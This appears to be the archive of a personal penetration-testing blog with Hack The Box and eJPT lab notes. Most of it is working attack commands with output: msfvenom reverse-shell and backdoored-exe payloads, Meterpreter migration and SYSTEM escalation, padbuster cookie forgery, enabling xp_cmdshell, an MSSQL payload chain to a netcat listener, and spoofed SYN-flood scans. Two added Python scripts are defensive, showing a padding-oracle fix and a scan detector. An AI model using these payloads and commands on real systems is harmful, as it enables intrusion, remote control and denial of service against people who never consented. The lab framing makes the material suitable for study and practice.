Port Scan:
#nmap -sS -A -p- -T4 IP
#nmap -sS --script vuln -p Ports IP
Vulnerability Scan:
OpenVAS
Web Scan:
dirb
Dirbuster
Yyj-websprider
Paros
Burp Suite
Sqlmap
Exploitation:
msfconsole
meterpreter
exploitdb / searchsploit
Backdoor:
msfvenom
msfconsole handler
Thursday, May 28, 2020
[HTB][meterpreter][msfconsole][metasploit]Migrate the process in Meterpreter
meterpreter > ps
...
2660 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2732 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.
Monday, May 25, 2020
Sunday, May 24, 2020
[HTB]An example of Padding Oracle Attack
1) Obtain the suspicious cookie. In this case, the cookie is:
auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy
2) Run the following command (the third argument, 8, is the cipher block size in bytes; -encoding 0 tells padbuster that the sample is Base64):
# padbuster http://10.10.XX.XX ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=aaa
[+] Decrypted value (HEX): 757365723D6161610808080808080808
[+] Decrypted value (Base64): dXNlcj1hYWEICAgICAgICA==
-------------------------------------------------------
3) Generate a new cookie by running the following command:
# padbuster http://10.10.10.18 ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0 -plaintext user=admin
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------
4) Use the new cookie to refresh the page. In this case, the new cookie is:
auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
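The attack padbuster automates works only because the server answers a malformed-padding cookie differently from a well-formed one. The following script is an added example, not part of the original post and not padbuster's code: it puts the vulnerable cookie check next to an encrypt-then-MAC version that removes the signal. The 8-byte block size and the "user=aaa" plaintext are taken from the post; the block cipher is a constructed toy Feistel stand-in so that the script runs with the standard library only, and the cookie layout, the response strings and the keys are assumptions of this example.

```python
import base64
import hashlib
import hmac
import os

BLOCK = 8  # block size in bytes, the "8" argument the post passes to padbuster

def _round_fn(key, half, i):
    # Round function of the toy cipher: first 4 bytes of SHA-256(key || round || half).
    return hashlib.sha256(key + bytes([i]) + half).digest()[:BLOCK // 2]

def toy_block_encrypt(key, block):
    # Constructed 4-round Feistel permutation: a stand-in so this runs with the standard
    # library only. It is NOT a real cipher; production code would use AES via a vetted library.
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in range(4):
        l, r = r, xor(l, _round_fn(key, r, i))
    return l + r

def toy_block_decrypt(key, block):
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in reversed(range(4)):
        l, r = xor(r, _round_fn(key, l, i)), l
    return l + r

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = toy_block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(toy_block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def pad(data):
    # PKCS#7: "user=aaa" becomes "user=aaa" + eight 0x08 bytes, the HEX value padbuster printed.
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def make_cookie(key, plaintext):
    # Vulnerable design: base64(iv || CBC ciphertext) with no integrity protection.
    iv = os.urandom(BLOCK)
    return base64.b64encode(iv + cbc_encrypt(key, iv, pad(plaintext))).decode()

def vulnerable_check(key, cookie):
    # A padding failure is answered differently from a logical failure: that is the oracle.
    raw = base64.b64decode(cookie)
    try:
        data = unpad(cbc_decrypt(key, raw[:BLOCK], raw[BLOCK:]))
    except ValueError:
        return "500 padding error"
    return "200 ok" if data == b"user=admin" else "403 denied"

def seal(enc_key, mac_key, plaintext):
    # Encrypt-then-MAC: HMAC-SHA256 over iv || ciphertext is appended to the cookie.
    iv = os.urandom(BLOCK)
    body = iv + cbc_encrypt(enc_key, iv, pad(plaintext))
    return base64.b64encode(body + hmac.new(mac_key, body, hashlib.sha256).digest()).decode()

def hardened_check(enc_key, mac_key, cookie):
    raw = base64.b64decode(cookie)
    body, tag = raw[:-32], raw[-32:]
    # Constant-time tag check before any decryption: every modified cookie gets the same
    # answer, so whether its padding would have been valid is never observable.
    if not hmac.compare_digest(tag, hmac.new(mac_key, body, hashlib.sha256).digest()):
        return "403 invalid"
    data = unpad(cbc_decrypt(enc_key, body[:BLOCK], body[BLOCK:]))  # cannot fail: body is authentic
    return "200 ok" if data == b"user=admin" else "403 denied"

def flip_padding_byte(cookie, delta):
    # XOR the last byte of ciphertext block 1; CBC turns that into the same XOR on the last
    # byte of plaintext block 2, which for "user=aaa" is the final padding byte 0x08.
    raw = bytearray(base64.b64decode(cookie))
    raw[2 * BLOCK - 1] ^= delta
    return base64.b64encode(bytes(raw)).decode()

if __name__ == "__main__":
    k, ek, mk = os.urandom(16), os.urandom(16), os.urandom(16)
    weak, strong = make_cookie(k, b"user=aaa"), seal(ek, mk, b"user=aaa")
    for d in (0x01, 0x09):  # 0x08^0x01 = 0x09 (invalid padding), 0x08^0x09 = 0x01 (valid padding)
        print(hex(d), vulnerable_check(k, flip_padding_byte(weak, d)),
              hardened_check(ek, mk, flip_padding_byte(strong, d)))
```

Run stand-alone, the vulnerable check answers the two tampered cookies differently ("500 padding error" versus "403 denied"), which is exactly the bit of information padbuster extracts one byte at a time; the hardened check answers "403 invalid" to both because the MAC is verified, in constant time, before the padding is ever looked at.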
Saturday, May 23, 2020
[HTB][msfvenom][metasploit]Msfvenom Cheat Sheet
#Copied from https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/
MsfVenom is the Metasploit standalone payload generator that replaced msfpayload and msfencode.
Binaries
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
    Creates a simple TCP payload for Windows
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
    Creates a simple HTTP payload for Windows
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf
    Creates a simple TCP shell for Linux
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho
    Creates a simple TCP shell for Mac
msfvenom -p android/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk
    Creates a simple TCP payload for Android
Web Payloads
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php
    Creates a simple TCP shell for PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp
    Creates a simple TCP shell for ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp
    Creates a simple TCP shell for JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war
    Creates a simple TCP shell packaged as a WAR
PHP Payload:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -a php -f raw > /home/demonalex/Downloads/example.php
Windows Payloads
msfvenom -l encoders
    Lists all available encoders
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
    Binds an exe with a payload (backdoors an exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > example.exe
    Creates a simple TCP payload with the shikata_ga_nai encoder
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe > example.exe
    Binds an exe with a payload and encodes it
How do I get the meterpreter shell?
nli@nlistation:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run
Thursday, May 21, 2020
[HTB][meterpreter][msfconsole]Find Privilege Escalation exploits through Metasploit
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 30 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
Wednesday, May 20, 2020
[HTB][meterpreter][msfconsole]A walkthrough of Privilege Escalation in Windows
meterpreter > getuid
Neither Administrator nor SYSTEM
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Tuesday, May 19, 2020
[HTB] Some usage of smbclient
# smbclient -N -L \\\\10.10.10.XXX\\
# smbclient \\\\10.10.10.XXX\\Users "welcome20XX" -U "TempUser"
smb: \> get abcdef~1.txt
smb: \> get "New Text Document.txt"
Monday, May 18, 2020
[Linux]Use Zip to compress files in Linux with password protection
# zip -re ./test.zip ./file1 ./file2 ./folder1 ./folder2
-r recurses into the folders; -e prompts for a password and encrypts the archive entries with it.
Thursday, May 14, 2020
[HTB]Knock down MS SQL Server through xp_cmdshell
Assume that a username/password pair has already been obtained. IS_SRVROLEMEMBER('sysadmin') returns 1 when the login holds the sysadmin role, which the sp_configure changes below require:
# mssqlclient.py account@10.10.10.xx -windows-auth
SQL> select IS_SRVROLEMEMBER ('sysadmin');
SQL> EXEC sp_configure 'Show Advanced Options', 1;
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1
SQL> reconfigure;
SQL> xp_cmdshell "whoami"
[HTB]Listing and accessing remote shares through smbclient
Show remote shares:
# smbclient -N -L \\\\192.168.0.100
After all shares are listed, pick one and connect to it:
# smbclient -N \\\\192.168.0.100\\share1
Show content in the share:
smb: \> dir
Download a file from the share:
smb: \> get aaa.txt
[HTB]Auto Scan through NMAP
#!/bin/bash
# Two-pass scan: a fast sweep of all ports first, then the default scripts and
# service detection only against the ports that were found open.
echo "TARGET IP:"
read -r ip
ports=$(nmap -p- --min-rate=1000 -T4 "$ip" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
if [ -z "$ports" ]; then
    echo "No open ports found on $ip"
    exit 1
fi
nmap -sC -sV -p"$ports" "$ip"
Wednesday, May 13, 2020
[HTB]POST HTTP data through Command Line
Example:
# curl -d "param1=value1&param2=value2" -H "Content-Type: application/x-www-form-urlencoded" -X POST http://localhost:3000/data
POST verb without any data:
# curl -XPOST https://www.xxxxxxxxx.xx/api/invite/generate
Tuesday, May 12, 2020
Saturday, May 9, 2020
Thursday, May 7, 2020
[eJPT][nmap]Apply Nmap to Synflood
Example #1 Command:
#watch -n 10 "nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251"
-e wlan0: Specify the network adapter that sends the packets.
-Pn: Skip the host-discovery ping and launch the scan directly.
-T5: The fastest timing template.
-S 192.168.0.253: Spoof the packet source address as 192.168.0.253.
192.168.0.251: The target.
The watch command relaunches the nmap scan every 10 seconds.
Example #2 Command:
#watch -n 0.1 "nmap -e eth0 -T5 -p443 -D 12.0.0.1,12.0.0.2,12.0.0.3,RND,ME,RND 10.10.77.245"
-e eth0: Specify the network adapter that sends the packets.
-T5: The fastest timing template.
-p443: Scan TCP port 443 of the target.
-D 12.0.0.1,12.0.0.2,12.0.0.3,RND,ME,RND: Spoof the packet sources as 12.0.0.1, 12.0.0.2, 12.0.0.3, a random IP, my own IP, and another random IP (a decoy scan).
10.10.77.245: The target.
The watch command relaunches the nmap scan every 0.1 seconds.
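Seen from the target's side, both commands leave distinctive traces: a -S run is one source address sending SYNs to many ports in a short window, and a -D run is a burst of several "sources" hitting the same port within milliseconds, repeated every 0.1 s. The script below is an added example, not part of the original post: it runs two simple heuristics over SYN records in a constructed firewall-log style. The log format, the thresholds and every address in the sample are assumptions made for this example (the decoy list and the target addresses mirror the two commands above).

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# One record per TCP SYN, in a constructed firewall-log style (not a real product's format):
#   <ISO-8601 timestamp> SYN <src_ip> -> <dst_ip>:<dst_port>
LINE_RE = re.compile(r"^(\S+) SYN (\S+) -> (\S+):(\d+)$")

def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.fromisoformat(m.group(1)).replace(tzinfo=timezone.utc).timestamp()
    return ts, m.group(2), m.group(3), int(m.group(4))

def analyze(lines, window_s=1.0, syn_threshold=15, source_threshold=5):
    """Bucket SYNs per destination host and fixed time window; return a list of alert dicts."""
    buckets = defaultdict(lambda: {"syns": 0, "srcs": set(), "ports": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # tolerate unrelated or malformed lines
        ts, src, dst, dport = rec
        b = buckets[(dst, int(ts // window_s))]
        b["syns"] += 1
        b["srcs"].add(src)
        b["ports"].add(dport)
    alerts = []
    for (dst, window), b in sorted(buckets.items()):
        base = {"dst": dst, "window": window, "syns": b["syns"],
                "sources": len(b["srcs"]), "ports": len(b["ports"])}
        if b["syns"] >= syn_threshold:
            # Volume heuristic: catches both the spoofed-source sweep (-S) and the decoy burst (-D).
            alerts.append(dict(base, type="syn_flood"))
        if len(b["srcs"]) >= source_threshold and len(b["ports"]) == 1:
            # Decoy heuristic: many "sources" probing exactly one port inside the same window
            # looks like nmap -D, not like independent clients.
            alerts.append(dict(base, type="decoy_burst"))
    return alerts

def constructed_log():
    """Sample input modelled on the two commands above; every address here is made up."""
    lines = []
    # Example #2 pattern: decoys 12.0.0.1-3, two RND addresses (new each round), ME = 192.168.0.10,
    # all aimed at 10.10.77.245:443 and repeated every 0.1 s.
    for r in range(3):
        stamp = f"2020-05-07T10:00:00.{r * 100:03d}"
        for src in ("12.0.0.1", "12.0.0.2", "12.0.0.3", f"203.0.113.{r + 1}",
                    "192.168.0.10", f"198.51.100.{r + 1}"):
            lines.append(f"{stamp} SYN {src} -> 10.10.77.245:443")
    # Example #1 pattern: one spoofed source (-S 192.168.0.253) sweeping ports on 192.168.0.251.
    for i in range(20):
        lines.append(f"2020-05-07T10:00:10.{i * 10:03d} SYN 192.168.0.253 -> 192.168.0.251:{1000 + i}")
    lines.append("2020-05-07T10:00:20.000 SYN 192.168.0.20 -> 192.168.0.251:22")  # one ordinary SSH client
    lines.append("garbage line that should be skipped")
    return lines

if __name__ == "__main__":
    for alert in analyze(constructed_log()):
        print(alert)
```

On the sample, the decoy burst raises both alerts for 10.10.77.245 (18 SYNs from 10 apparent sources, all on port 443), the spoofed sweep raises only the volume alert for 192.168.0.251 (20 SYNs, one source, 20 ports), and the lone SSH connection raises nothing. The thresholds are deliberately low for a small sample; on real traffic they would be tuned per destination.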
Monday, May 4, 2020
[eJPT][spider]A script for crawling websites as Web Grep
#!/usr/bin/perl -w
#This script is named by YYJ, who is my friend and a smart lady.
#It is used for CTF and written by demonalex.
use strict;
use Cwd;

$| = 1;
my $original_dir = getcwd;

# Work in a randomly named scratch directory under /tmp so the mirror can be removed afterwards.
my $folder = "";
for (0..7) { $folder .= chr(int(rand(25)) + 65); }
system("mkdir", "-p", "/tmp/$folder") == 0 or die("Cannot create /tmp/$folder\n");
chdir "/tmp/$folder" or die("Cannot enter /tmp/$folder\n");

print("Target URL (e.g. http://192.168.0.1:8080/ or http://www.163.com/): ");
my $target_url = <STDIN>;
die("Target URL is not defined!\n") unless defined($target_url);
chomp($target_url);
die("Target URL is not defined!\n") if $target_url eq "";

print("Maximum Recursion Depth (Default: 5): ");
my $mrd = <STDIN>;
chomp($mrd) if defined($mrd);
$mrd = 5 if !defined($mrd) || $mrd eq "";

print("Keyword (Default: password): ");
my $keyword = <STDIN>;
chomp($keyword) if defined($keyword);
$keyword = "password" if !defined($keyword) || $keyword eq "";

#print("\$target_url : $target_url\n");
#print("\$mrd: $mrd\n");
#print("\$keyword: $keyword\n");

# Mirror the site down to the given depth, then grep the mirrored files for the keyword.
# The list form of system() hands each argument over directly, so neither the URL nor the
# keyword is interpreted by a shell.
system("wget", "-q", "-r", "-l", $mrd, $target_url);
print("----------------------------------------\n");
system("grep", "-nR", "-i", $keyword, ".");

chdir $original_dir;
system("rm", "-Rf", "/tmp/$folder");
exit(0);
Sunday, May 3, 2020
[eJPT]Crack MS SQL Server
The main idea is shown below:
- First, obtain a username/password pair of the target, a MS SQL Server;
- Second, utilize Hydra to verify the username/password pair;
- Third, launch Metasploit-Framework to exploit the MS SQL Server through the following sequence:
* auxiliary/scanner/mssql/mssql_login
* auxiliary/admin/mssql/mssql_enum
* exploit/windows/mssql/mssql_payload
1) Obtain a username/password pair and verify that the pair works by applying Hydra:
#hydra -l admin -p test123 mssql://172.16.33.33
2) Verify the username/password pair by Metasploit Framework:
#msfconsole
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set username xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set password xxx
msf5 auxiliary(scanner/mssql/mssql_login) > run
3) Enumerate the other users:
msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set username xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set password xxx
msf5 auxiliary(admin/mssql/mssql_enum) > run
4) Install a Meterpreter backdoor:
msf5 auxiliary(admin/mssql/mssql_enum) > use exploit/windows/mssql/mssql_payload
msf5 exploit(windows/mssql/mssql_payload) > set rhosts xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set username xxx
msf5 exploit(windows/mssql/mssql_payload) > set password xxx
msf5 exploit(windows/mssql/mssql_payload) > set SRVPORT 53
msf5 exploit(windows/mssql/mssql_payload) > set payload windows/x64/shell_reverse_tcp
msf5 exploit(windows/mssql/mssql_payload) > set lhost xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set lport 5555
#nc -k -l -p 5555
msf5 exploit(windows/mssql/mssql_payload) > exploit
5) Happy hunting!
[eJPT]Find files in Windows
Find files through their filename:
c:\>dir *password*.txt /s /b /p
Find files through their content:
c:\>findstr /s /m /i administrator c:\users